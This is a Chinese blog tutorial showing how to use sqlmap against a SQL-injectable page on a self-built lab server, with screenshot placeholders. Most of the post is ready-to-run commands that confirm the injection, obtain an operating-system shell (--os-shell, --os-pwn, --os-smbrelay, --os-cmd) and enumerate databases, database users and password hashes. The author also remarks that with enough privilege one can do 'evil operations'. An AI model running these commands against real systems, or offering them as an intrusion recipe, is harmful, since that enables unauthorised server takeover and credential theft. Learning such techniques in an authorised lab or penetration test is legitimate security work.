Kali-SQLmap寻找注入点入侵电脑

SQLmap命令

 

测试一次入侵

注入点:http://192.168.207.131/demo/sql.php?news=1

内网搭建的注入点

 

 

1.打开kali终端输入

-u //目标地址,检查该注入点是否存在注入

sqlmap -u "http://192.168.207.131/demo/sql.php?news=1"

没有出现红色的报错证明该注入寻在注入

2019-12-10 11-24-09 的屏幕截图.png

2.直接进行暴力拿shell(如果失败进行第三步)

 sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-shell   //获取该服务器的shell

2019-12-10 11-28-24 的屏幕截图.png

这里选择该网站使用的语言(默认是PHP)选择4然后一直回车

这里成功获取到shell,权限足够的话,可以直接进行一些邪恶的操作

2019-12-10 11-30-14 的屏幕截图.png

3.没有获取成功也别急可以试试另外几个


sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-pwn    //获取一个OOB shell,meterpreter或VNC 

sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-smbrelay              // 一键获取一个OOB  shell,meterpreter或VNC 

sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-cmd=OSCMD      //执行操作系统命令 

 

4.猜解库名(都不行看这里)

sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --dbs   //猜解数据库表名

2019-12-10 15-46-45 的屏幕截图.png

5.直接猜解数据库的用户名和该数据库密码的哈希值

sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --users   //枚举数据库管理系统用户 

sqlmap -u "http://192.168.207.131/demo/sql.php?news=1"  --passwords       //枚举数据库管理系统用户密码哈希 

2019-12-10 16-01-03 的屏幕截图.png

2019-12-10 16-22-37 的屏幕截图.png

--小顾

 

 

 

 

 

 

 

本博客所有文章如无特别注明均为原创。作者:GS小顾复制或转载请以超链接形式注明转自 世纪博客
原文地址《Kali-SQLmap寻找注入点入侵电脑
分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)